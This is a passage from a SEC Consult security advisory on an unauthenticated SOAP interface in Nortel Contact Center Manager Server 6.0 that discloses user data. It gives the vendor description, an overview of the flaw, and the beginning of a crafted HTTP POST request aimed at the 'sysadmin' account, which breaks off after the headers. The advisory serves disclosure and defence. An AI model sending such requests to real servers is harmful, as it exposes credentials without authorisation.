|
SEC Consult Security Advisory < 20090525-1 >
========================================================================= title: Nortel Contact Center Manager Server Password
Disclosure
program: Nortel Contact Center Manager Server
vulnerable version: 6.0
homepage: http://www.nortel.com/ccms
found: 2008-11-14
by: David Matscheko / SEC Consult Vulnerability Lab
permanent link: https://www.sec-consult.com/advisories_e.html#a57
=========================================================================
Vendor description:
-------------------
Contact Center Manager Server (CCMS) offers a scalable solution for
dynamic contact center environments requiring sophistication and
differentiation in the care offered to their customers. CCMS provides
skill-based routing; call treatment flexibility, real time displays,
multimedia routing, and comprehensive management and reporting
functionality - empowering contact center managers with the tools and
agility to deliver unique and unprecedented care to their customers. The
rich scripting language supports multifaceted call routing and treatment
decisions based on combinations of real time conditions.
[source: http://www.nortel.com/ccms]
Vulnerability overview:
-----------------------
The Nortel Contact Center Manager Server web application provides a SOAP
interface. This interface does not need authorisation and responds to
certain requests with sensitive information.
Vulnerability description:
--------------------------
The following SOAP request queries the user data for the user
"sysadmin":
---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction:
"http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661